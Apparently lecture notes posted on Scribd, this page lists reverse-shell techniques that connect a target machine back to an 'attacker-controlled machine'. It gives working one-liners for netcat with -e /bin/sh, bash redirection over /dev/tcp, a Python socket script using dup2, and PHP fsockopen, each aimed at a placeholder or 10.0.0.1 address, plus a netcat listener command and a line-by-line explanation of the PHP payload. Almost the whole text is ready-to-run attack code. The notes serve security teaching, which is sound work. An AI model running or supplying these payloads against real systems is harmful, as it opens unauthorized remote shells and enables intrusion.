Scribd
Upload
16 views

Lecture 6 Codes

The document describes four methods to establish a reverse shell connection from a target machine to an attacker's machine: 1. Using Netcat to execute a shell that connects back to the attacker's IP and port. 2. Using Bash to execute a shell that connects back via TCP. 3. Using a Python script to create a socket connection, duplicate file descriptors, and execute a reverse shell. 4. Using a PHP code snippet to open a socket connection and execute a reverse shell that redirects stdin, stdout, and stderr over the socket.

Uploaded by

Max Riddle
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
16 views

Lecture 6 Codes

The document describes four methods to establish a reverse shell connection from a target machine to an attacker's machine: 1. Using Netcat to execute a shell that connects back to the attacker's IP and port. 2. Using Bash to execute a shell that connects back via TCP. 3. Using a Python script to create a socket connection, duplicate file descriptors, and execute a reverse shell. 4. Using a PHP code snippet to open a socket connection and execute a reverse shell that redirects stdin, stdout, and stderr over the socket.

Uploaded by

Max Riddle
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 2

Reverse shell techniques to establish a network connection from the target

machine to an attacker-controlled machine

Example 1 Using Netcat (nc):


nc -e /bin/sh <attacker IP> <attacker port>
OR
nc -e /bin/sh 10.0.0.1 1234

nc -l -p 8080 –vvv this command used to setting up a Netcat listener on a specific port.
Number of vvv providing more detailed information as number of v increase
Example 2 Using Bash
bash -i >& /dev/tcp/<attacker IP>/<attacker port> 0>&1
OR
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Example 3: Using Python code


import socket,subprocess,os

#Step 1 Create a socket object <-------------------comments


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# step 2 Connect to the attacker's machine


s.connect(("<attacker IP>", <attacker port>))

# step 3 Duplicate the socket file descriptors to stdin, stdout, and stderr
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)

# step 4 Execute a shell ("/bin/sh") with the "-i" flag for interactive mode
p = subprocess.call(["/bin/sh", "-i"])

OR
python -c 'import socket,subprocess,os;
 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
 s.connect(("10.0.0.1",1234));
 os.dup2(s.fileno(),0);
 os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
 p=subprocess.call(["/bin/sh","-i"]);’

Example 4: UsingPHP Code


php -r '$sock=fsockopen("<attacker IP>", <attacker port>);exec("/bin/sh -i <&3 >&3
2>&3");'
OR
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");’

Explaination
$sock=fsockopen("<attacker IP>", <attacker port>);:

fsockopen: This function opens a network connection or a socket to the specified IP address
and port.
<attacker IP>: Replace this with the actual IP address of the machine controlled by the
attacker.
<attacker port>: Replace this with the port number on which the attacker is listening for the
connection.
The result of fsockopen is assigned to the variable $sock.

exec("/bin/sh -i <&3 >&3 2>&3");:

exec: This function is used to execute a command.


"/bin/sh -i <&3 >&3 2>&3": This command executes a shell (/bin/sh) with the -i flag for
interactive mode.
<&3: Redirects file descriptor 3 to standard input.
>&3: Redirects standard output to file descriptor 3.
2>&3: Redirects standard error to file descriptor 3.

You might also like